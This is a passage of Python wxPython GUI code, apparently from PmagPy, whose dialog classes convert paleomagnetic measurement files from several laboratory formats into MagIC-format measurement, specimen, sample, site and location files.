options_dict['instrument'] = str(instrument)\n        if instrument:\n            instrument = \"-ins \" + instrument\n        replicate = self.bSizer7.return_value()\n        if replicate:\n            options_dict['noave'] = 0\n            replicate = ''\n        else:\n            options_dict['noave'] = 1\n            replicate = '-A'\n        peak_AF = self.bSizer8.return_value()\n        if not peak_AF:\n            peak_AF = 0\n        options_dict['peakfield'] = peak_AF\n        if peak_AF:\n            peak_AF = \"-ac \" + peak_AF\n        coil_number = self.bSizer9.return_value()\n        options_dict['coil'] = coil_number\n        if coil_number:\n            coil_number = \"-V \" + coil_number\n        cooling_rates=\"\"\n        cooling_rates = self.bSizer10.return_value()\n        options_dict['cooling_rates'] = cooling_rates\n\n        lat, lon = '', ''\n        #try: lat,lon = self.bSizer11.return_value().split()\n        #except ValueError: pass\n        options_dict['lat'] = lat\n        options_dict['lon'] = lon\n        lat = '-lat ' + lat\n        lon = '-lon ' + lon\n\n        # Force -A option on cooling rate correction experiment\n        if cooling_rates !=\"\" and experiment_type ==\"-LP CR\":\n            replicate = '-A'\n            options_dict['noave'] = 1\n\n        SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n        SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n        SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n        LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n        options_dict['spec_file'] = SPEC_OUTFILE\n        options_dict['samp_file'] = SAMP_OUTFILE\n        options_dict['site_file'] = SITE_OUTFILE\n        options_dict['loc_file'] = LOC_OUTFILE\n\n        COMMAND = \"sio_magic.py -F {0} -Fsp {1} -Fsa {2} -Fsi {3} -Flo {4} -f {5} -spc {6} -ncn {7} {8} {9} {10} {11} {12} {13} {14} {15} {16}\".format(outfile, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE, SIO_file, spc, ncn, user, experiment_type, cooling_rates, loc_name, lab_field, peak_AF, coil_number, instrument, replicate)#, lat, lon)\n        print(\"COMMAND\", COMMAND)\n        # to run as module:\n        if convert.sio(**options_dict):\n            pw.close_window(self, COMMAND, outfile)\n        else:\n            pw.simple_warning()\n\n    def on_helpButton(self, event):\n        
pw.on_helpButton(text=convert.sio.__doc__)\n\n\nclass convert_CIT_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"Class that converts CIT files magnetometer files into MagIC format for analysis and archiving\"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"CIT Format file (.sam)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n TEXT=\"Measurer (optional):\"\n self.bSizer1 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 2 ----\n self.bSizer2 = pw.sampling_particulars(pnl)\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ---\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.specimen_n(pnl)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n self.bSizer7.replicate_rb2.SetValue(True)\n\n #---sizer 9 ----\n TEXT=\"Number of measurement orientations (default=8)\"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a CIT format file')\n return False\n input_directory, CIT_file = os.path.split(full_file)\n options_dict['magfile'] = CIT_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = CIT_file + \".magic\"\n options_dict['meas_file'] = outfile\n samp_outfile = CIT_file[:CIT_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n spec_outfile = CIT_file[:CIT_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n site_outfile = CIT_file[:CIT_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = CIT_file[:CIT_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options_dict['user'] = user\n dc_flag,dc_params = '',''\n if self.bSizer3.return_value() != '':\n dc_params = self.bSizer3.return_value().split()\n 
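# The CIT handler above derives every MagIC output name from the input file
# name, a pattern that all of the converters in this module repeat. A
# standalone sketch of that pattern (magic_output_names is a hypothetical
# helper, not part of pmag_gui):
def magic_output_names(mag_file):
    """Map an input measurement file name to the standard MagIC output set."""
    base = mag_file[:mag_file.find('.')]  # everything before the first dot
    return {'meas_file': mag_file + '.magic',
            'spec_file': base + '_specimens.txt',
            'samp_file': base + '_samples.txt',
            'site_file': base + '_sites.txt',
            'loc_file': base + '_locations.txt'}

# example: magic_output_names('mysite.sam')['samp_file'] == 'mysite_samples.txt'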
options_dict['labfield'] = dc_params[0]\n            options_dict['phi'] = dc_params[1]\n            options_dict['theta'] = dc_params[2]\n            dc_flag = '-dc'\n        if user:\n            user = \"-usr \" + user\n        spec_num = self.bSizer5.return_value()\n        options_dict['specnum'] = spec_num\n        if spec_num:\n            spec_num = \"-spc \" + str(spec_num)\n        else:\n            spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n        loc_name = self.bSizer6.return_value()\n        options_dict['locname'] = loc_name\n        if loc_name:\n            loc_name = \"-loc \" + loc_name\n        ncn = self.bSizer4.return_value()\n        options_dict['samp_con'] = ncn\n        particulars = self.bSizer2.return_value()\n        options_dict['methods'] = particulars\n        if particulars:\n            particulars = \"-mcd \" + particulars\n        replicate = self.bSizer7.return_value()\n        if replicate:\n            options_dict['noave'] = False\n            replicate = ''\n        else:\n            options_dict['noave'] = True\n            replicate = '-A'\n\n        meas_n_orient = self.bSizer9.return_value()\n        if meas_n_orient!='':\n            try:\n                int(meas_n_orient)\n                options_dict['meas_n_orient'] = meas_n_orient\n            except ValueError:\n                pw.simple_warning(\"value for number of measured orientations must be a positive integer\")\n\n        COMMAND = \"cit_magic.py -WD {} -f {} -F {} {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -mno {}\".format(wd, CIT_file, outfile, particulars, spec_num, loc_name, user, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dc_params, meas_n_orient)\n        # to run as module:\n        program_ran, error_message = convert.cit(**options_dict)\n        if program_ran:\n            pw.close_window(self, COMMAND, outfile)\n        else:\n            pw.simple_warning(error_message)\n\n    def on_helpButton(self, event):\n        pw.on_helpButton(text=convert.cit.__doc__)\n\n\nclass convert_HUJI_files_to_MagIC(convert_files_to_MagIC):\n    \"\"\" \"\"\"\n    def InitUI(self):\n\n        pnl = self.panel\n\n        TEXT = \"HUJI format file\"\n        bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n        bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n        #---sizer 0 ----\n        self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n        TEXT = \"HUJI sample orientation data file (Optional)\"\n        bSizer_infoA = wx.BoxSizer(wx.HORIZONTAL)\n        bSizer_infoA.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n        #---sizer 0A ----\n        self.bSizer0A = pw.choose_file(pnl, 'add', method = self.on_add_dat_file_button)\n\n        #---sizer 1 ----\n        self.bSizer1 = pw.labeled_text_field(pnl)\n\n        #---sizer 2 ----\n        exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'NRM only', 'TRM acquisition', 'Anisotropy experiment', 'Cooling rate experiment']\n        self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n        #---sizer 2a ---\n        #for box in self.bSizer2.boxes:\n        #    self.Bind(wx.EVT_CHECKBOX, self.on_select_protocol, box)\n        self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL )\n        text = 'Cooling Rate (required only for cooling rate type experiments)\\nformat is xxx,yyy,zzz with no spaces '\n        self.cooling_rate = wx.TextCtrl(pnl)\n        self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n        #---sizer 3 ----\n        self.bSizer3 = pw.lab_field(pnl)\n\n        #---sizer 4 ---\n        TEXT = \"specify number of characters to designate a specimen, default = 0\"\n        self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 5 ----\n        self.bSizer5 = pw.select_ncn(pnl)\n\n        #---sizer 6 ----\n        TEXT=\"Location name:\"\n        self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 7 ---\n        #TEXT = \"peak AF field (mT) if ARM: \"\n        #self.bSizer7 = pw.labeled_text_field(pnl, 
TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(bSizer_infoA, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0A, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(True)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_dat_file_button(self,event):\n text = \"HUJI sample orientation data file (Optional)\"\n pw.on_add_file_button(self.bSizer0A, text)\n\n def on_okButton(self, event):\n \"\"\"\n grab user input values, format them, and run huji_magic.py with the appropriate flags\n \"\"\"\n os.chdir(self.WD)\n options = {}\n HUJI_file = self.bSizer0.return_value()\n if not HUJI_file:\n pw.simple_warning(\"You must select a HUJI format file\")\n return False\n options['magfile'] = HUJI_file\n dat_file = self.bSizer0A.return_value()\n if os.path.isfile(dat_file): options['datafile'] = dat_file\n else: dat_file=\"\"\n magicoutfile=os.path.split(HUJI_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options['meas_file'] = outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options['spec_file'] = spec_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options['samp_file'] = samp_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options['site_file'] = site_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options['user'] = user\n if user:\n user = '-usr ' + user\n experiment_type = self.bSizer2.return_value()\n options['codelist'] = experiment_type\n if not experiment_type:\n pw.simple_warning(\"You must select an experiment type\")\n return False\n cooling_rate = self.cooling_rate.GetValue() or 0\n if cooling_rate:\n experiment_type = experiment_type + \" \" + cooling_rate\n lab_field = self.bSizer3.return_value()\n if not lab_field:\n lab_field = \"0 0 0\"\n lab_field_list = lab_field.split()\n options['labfield'] = lab_field_list[0]\n options['phi'] = lab_field_list[1]\n options['theta'] = lab_field_list[2]\n lab_field = '-dc ' + lab_field\n spc = self.bSizer4.return_value()\n options['specnum'] = spc or 0\n if not spc:\n spc = '-spc 0'\n else:\n spc = '-spc ' + spc\n ncn = 
self.bSizer5.return_value()\n        options['samp_con'] = ncn\n        loc_name = self.bSizer6.return_value()\n        options['location'] = loc_name\n        if loc_name:\n            loc_name = '-loc ' + loc_name\n        #peak_AF = self.bSizer7.return_value()\n        #options['peakfield'] = peak_AF\n\n        replicate = self.bSizer8.return_value()\n        if replicate:\n            options['noave'] = 0\n            replicate = ''\n        else:\n            options['noave'] = 1\n            replicate = '-A'\n\n        COMMAND = \"huji_magic_new.py -f {} -fd {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} -LP {} {} -ncn {} {} {} {}\".format(HUJI_file, dat_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, user, experiment_type, loc_name, ncn, lab_field, spc, replicate)\n        program_ran, error_message = convert.huji(**options)\n        if program_ran:\n            pw.close_window(self, COMMAND, outfile)\n        else:\n            pw.simple_warning(error_message)\n\n    def on_helpButton(self, event):\n        pw.on_helpButton(text=convert.huji.__doc__)\n\n\nclass convert_2g_binary_files_to_MagIC(convert_files_to_MagIC):\n\n    def InitUI(self):\n\n        pnl = self.panel\n\n        TEXT = \"Folder containing one or more 2g-binary format files\"\n        bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n        bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n        #---sizer 0 ----\n        #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n        self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n        #---sizer 1 ----\n        self.bSizer1 = pw.sampling_particulars(pnl)\n\n        #---sizer 2 ----\n        ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter 
os.chdir(self.WD)\n options_dict = {}\n WD = self.WD\n options_dict['dir_path'] = WD\n directory = self.bSizer0.return_value()\n options_dict['input_dir'] = directory\n if not directory:\n pw.simple_warning('You must select a directory containing 2g binary files')\n return False\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).endswith('.dat') or str(f).endswith('.DAT')]\n if not files:\n pw.simple_warning('No .dat files found in {}'.format(directory))\n return False\n ID = \"-ID \" + directory\n if self.bSizer1.return_value():\n particulars = self.bSizer1.return_value()\n options_dict['gmeths'] = particulars\n mcd = '-mcd ' + particulars\n else:\n mcd = ''\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer3.return_value()\n options_dict['specnum'] = spc or 0\n if not spc:\n spc = '-spc 1'\n else:\n spc = '-spc ' + spc\n ocn = self.bSizer4.return_value()\n options_dict['or_con'] = ocn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n instrument = self.bSizer6.return_value()\n options_dict['inst'] = instrument\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n replicate = '-a'\n options_dict['noave'] = 0\n else:\n replicate = ''\n options_dict['noave'] = 1\n for f in files:\n file_2g_bin = f\n outfile = file_2g_bin + \".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_bin + \"_specimens.txt\"\n samp_outfile = file_2g_bin + \"_samples.txt\"\n site_outfile = file_2g_bin + \"_sites.txt\"\n loc_outfile = file_2g_bin + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_bin_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_bin, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_bin(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_bin(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_bin_magic.py -h\")\n\n\nclass convert_2g_ascii_files_to_MagIC(convert_files_to_MagIC):\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"Folder containing one or more 2g-ascii format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter 
number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n        self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n        #---sizer 3 ----\n        TEXT = \"specify number of characters to designate a specimen, default = 0\"\n        self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 4 ----\n        self.bSizer4 = pw.select_specimen_ocn(pnl)\n\n        #---sizer 5 ----\n        TEXT=\"Location name:\"\n        self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 6 ---\n        TEXT=\"Instrument name (optional):\"\n        self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n        #---sizer 7 ----\n        self.bSizer7 = pw.replicate_measurements(pnl)\n\n        #---sizer 8 ----\n        self.bSizer8 = pw.site_lat_lon(pnl)\n\n        #---buttons ---\n        hboxok = pw.btn_panel(self, pnl) # creates ok, cancel, help buttons and binds them to appropriate methods\n\n        #------\n        vbox=wx.BoxSizer(wx.VERTICAL)\n\n        vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n        vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n        vbox.AddSpacer(20)\n\n        hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n        hbox_all.AddSpacer(20)\n        hbox_all.Add(vbox)\n        hbox_all.AddSpacer(20)\n\n        self.panel.SetSizer(hbox_all)\n        self.panel.SetScrollbars(20, 20, 50, 50)\n        hbox_all.Fit(self)\n        self.Centre()\n        self.Show()\n\n\n    #---button methods ---\n\n    def on_okButton(self, event):\n        os.chdir(self.WD)\n        options_dict = {}\n        WD = self.WD\n        options_dict['dir_path'] = WD\n        directory = self.bSizer0.return_value()\n        options_dict['input_dir'] = directory\n        if not directory:\n            pw.simple_warning('You must select a directory containing 2g ascii files')\n            return False\n        files = os.listdir(directory)\n        files = [str(f) for f in files if str(f).endswith('.asc') or str(f).endswith('.ASC')]\n        if not files:\n            pw.simple_warning('No .asc files found in {}'.format(directory))\n            return False\n        ID = \"-ID \" + directory\n        if self.bSizer1.return_value():\n            particulars = self.bSizer1.return_value()\n            options_dict['gmeths'] = particulars\n            mcd = '-mcd ' + particulars\n        else:\n            mcd = ''\n        ncn = self.bSizer2.return_value()\n        options_dict['samp_con'] = ncn\n        spc = self.bSizer3.return_value()\n        options_dict['specnum'] = spc or 0\n        if not spc:\n            spc = '-spc 1'\n        else:\n            spc = '-spc ' + spc\n        ocn = self.bSizer4.return_value()\n        options_dict['or_con'] = ocn\n        loc_name = self.bSizer5.return_value()\n        options_dict['location'] = loc_name\n        if loc_name:\n            loc_name = \"-loc \" + loc_name\n        try: lat,lon = self.bSizer8.return_value().split()\n        except ValueError: lat,lon = '',''\n        options_dict['lat'] = lat\n        options_dict['lon'] = lon\n        instrument = self.bSizer6.return_value()\n        options_dict['inst'] = instrument\n        if instrument:\n            instrument = \"-ins \" + instrument\n        replicate = self.bSizer7.return_value()\n        if replicate:\n            replicate = '-a'\n            options_dict['noave'] = 0\n        else:\n            replicate = ''\n            options_dict['noave'] = 1\n        for f in files:\n            file_2g_asc = f\n            outfile = file_2g_asc + 
\".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_asc + \"_specimens.txt\"\n samp_outfile = file_2g_asc + \"_samples.txt\"\n site_outfile = file_2g_asc + \"_sites.txt\"\n loc_outfile = file_2g_asc + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_asc_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_asc, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_asc(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_asc(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_asc_magic.py -h\")\n\nclass convert_LDEO_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"LDEO format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 2 ---\n exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'Shaw method', 'IRM (acquisition)', 'NRM only', 'TRM acquisition', 'double AF demag', 'triple AF demag (GRM protocol)', 'Anisotropy experiment']\n self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n #---sizer 2a ---\n # add conditional boxsizer for Shaw experiments\n # if arm_labfield and trm_peakT are properly added into ldeo_magic\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---sizer 9 ----\n TEXT = \"peak AF field (mT) if ARM: \"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 10 ---\n TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 11 ---\n self.bSizer11 = pw.mass_or_volume_buttons(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1 = wx.BoxSizer(wx.HORIZONTAL)\n hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1.Add(self.bSizer10, flag=wx.ALIGN_LEFT)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, 
flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER|wx.BOTTOM, border=20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n LDEO_file = self.bSizer0.return_value()\n if not LDEO_file:\n pw.simple_warning(\"You must provide a LDEO format file\")\n return False\n options_dict['magfile'] = LDEO_file\n magicoutfile=os.path.split(LDEO_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options_dict['meas_file'] = outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['spec_file'] = spec_outfile\n 